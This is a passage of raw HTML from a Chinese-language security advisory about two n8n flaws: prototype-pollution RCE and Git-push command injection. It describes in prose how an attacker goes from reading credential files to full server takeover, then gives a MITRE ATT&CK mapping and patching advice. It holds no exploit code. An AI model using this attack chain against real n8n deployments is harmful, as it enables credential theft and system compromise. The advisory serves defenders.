Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第四步：凭据窃取</span></strong><span leaf="">。利用 CVE-2026-44790 的命令行注入漏洞，通过 Git push 操作读取服务器上的敏感文件——配置、密钥、凭据统统落入攻击者手中。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第五步：全面接管</span></strong><span leaf="">。结合前几步获取的凭据和环境信息，攻击者可在服务器上执行任意代码，完成从&#34;低权限用户&#34;到&#34;系统控制者&#34;的权限跨越。整个过程静默高效，不会触发常规安全监控的告警阈值。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">在典型的企业部署中，n8n 实例往往以服务账户或系统账户权限运行。一旦攻击者完成 RCE，其获得的不是普通用户权限，而是能够访问环境变量、配置文件乃至底层系统的更高权限级别。这使得后续的横向移动和数据窃取成本几乎为零。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁态势评估</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">平台普及度推高实际风险</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">n8n 的设计哲学强调灵活性和易用性。用户无需深厚的编程背景，即可通过可视化界面将 API、云服务、数据库等组件串联成自动化工作流程。这一定位直接导致了两个后果：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">用户群体庞大且分散</span></strong><span leaf="">：开发团队、运维团队乃至业务团队都可能独立部署 n8n 实例，导致资产管理出现盲区。</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">连接范围广泛</span></strong><span leaf="">：n8n 通常持有大量第三方服务的 API 密钥、数据库访问凭据和环境配置信息，一旦被攻陷，攻击者获取的不只是一个平台，而是整个集成链条的访问权。</span></span></li></ol><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">从奇安信全球威胁视野来看，这类处于供应链&#34;中间位置&#34;的自动化平台，正在成为高级威胁行为体优先关注的目标——控制一个枢纽节点的价值，远高于攻陷单个终端。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">利用门槛与攻击烈度的错配</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">当前披露信息显示，这些漏洞需要&#34;低权限认证&#34;作为前置条件。但奇安信安全研究团队提醒，这一限制条件在实际企业环境中并不构成有效防护：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">在许多组织中，&#34;创建工作流程&#34;的权限已广泛授予开发者和部分业务人员</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">n8n 的多用户协作特性意味着同一实例上往往存在多个具备编辑权限的账户</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">即使是内部用户，其账户被攻陷（如钓鱼攻击、凭据复用）的概率并不低</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">综合评估，</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">实际可利用的攻击面远超实验室环境下的理想化评估</span></strong><span leaf="">。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">公开 Exploit 预期</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">安全社区通常遵循&#34;漏洞披露→研究验证→PoC 公开&#34;的演进路径。鉴于这三个漏洞的利用复杂度相对可控（无需复杂的漏洞利用链），且 CVSS 评分一致处于高危区间，奇安信威胁情报中心研判，公开的漏洞利用代码（PoC/EXP）预计将在短期内出现。一旦公开代码可用，结合 n8n 在全球范围内的广泛部署，规模化攻击窗口将迅速打开。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">MITRE ATT&amp;CK 技战术映射</span></h2><table style="overflow-wrap:break-word;color:rgb(43, 48, 59);border-collapse:collapse;margin:1.5em 8px;font-family:-apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size:16px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-transform:none;widows:2;word-spacing:0px;-webkit-text-stroke-width:0px;white-space:normal;text-decoration-thickness:initial;text-decoration-style:initial;text-decoration-color:initial;width:560px;"><thead><tr style="overflow-wrap: break-word;"><th data-colwidth="90" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术 ID</span></p></th><th data-colwidth="136" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术名称</span></p></th><th data-colwidth="125" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">攻击阶段</span></p></th><th data-colwidth="209" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">本事件关联</span></p></th></tr></thead><tbody><tr style="overflow-wrap: break-word;"><td data-colwidth="90" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1203</span></p></td><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">通过软件漏洞利用执行代码</span></p></td><td data-colwidth="125" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">初始访问/执行</span></p></td><td data-colwidth="209" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-44789 原型污染触发 RCE</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="90" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1059</span></p></td><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">命令与脚本解释器</span></p></td><td data-colwidth="125" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">执行</span></p></td><td data-colwidth="209" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-44790 命令行注入后执行任意命令</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="90" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1552</span></p></td><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">未安全存储的凭据</span></p></td><td data-colwidth="125" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">凭据访问</span></p></td><td data-colwidth="209" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">通过文件读取获取配置文件中的密钥</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="90" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1027</span></p></td><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">混淆文件或信息</span></p></td><td data-colwidth="125" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">防御规避</span></p></td><td data-colwidth="209" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">原型污染技术本身具有混淆效果</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="90" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1570</span></p></td><td data-colwidth="136" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">横向工具传输</span></p></td><td data-colwidth="125" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">横向移动</span></p></td><td data-colwidth="209" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">获取凭据后在其他系统展开行动</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">缓解建议</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">紧急措施（24-72 小时内）</span></h3><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">立即升级</span></strong><span leaf="">：将所有 n8n 实例升级至 1.123.43、2.20.7、2.22.1 或更高版本。这是消除风险的最直接手段。</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">临时缓解</span></strong><span leaf="">：如无法立即升级，可通过设置环境变量 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">N8N_NODES_EXCLUDE</span></code><span leaf=""> 禁用 HTTP Request、Git 和 XML 节点，同时严格限制工作流程的创建和编辑权限仅授予最小必要人员。</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">权限审查</span></strong><span leaf="">：审计所有拥有工作流程编辑权限的账户，撤销非必要权限，启用多因素认证（MFA）。</span></span></li></ol><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">中期加固（1-2 周内）</span></h3><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">在 n8n 实例前部署 Web 应用防火墙（WAF），对工作流程配置接口的异常请求进行检测和阻断</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">建立 n8n 版本管理机制，确保所有节点版本始终处于官方支持的最新稳定分支</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">对 n8n 实例的网络访问进行精细化控制，限制其仅能访问必要的下游服务</span></span></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">长期安全建设</span></h3><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">将 n8n 实例纳入配置管理（CMDB）系统，确保所有部署实例无遗漏</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">在 CI/CD 流程中集成安全扫描环节，对自动化工作流程的配置进行合规性检查</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">建立威胁情报订阅机制，第一时间获取相关漏洞的公开利用情报</span></span></li></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: 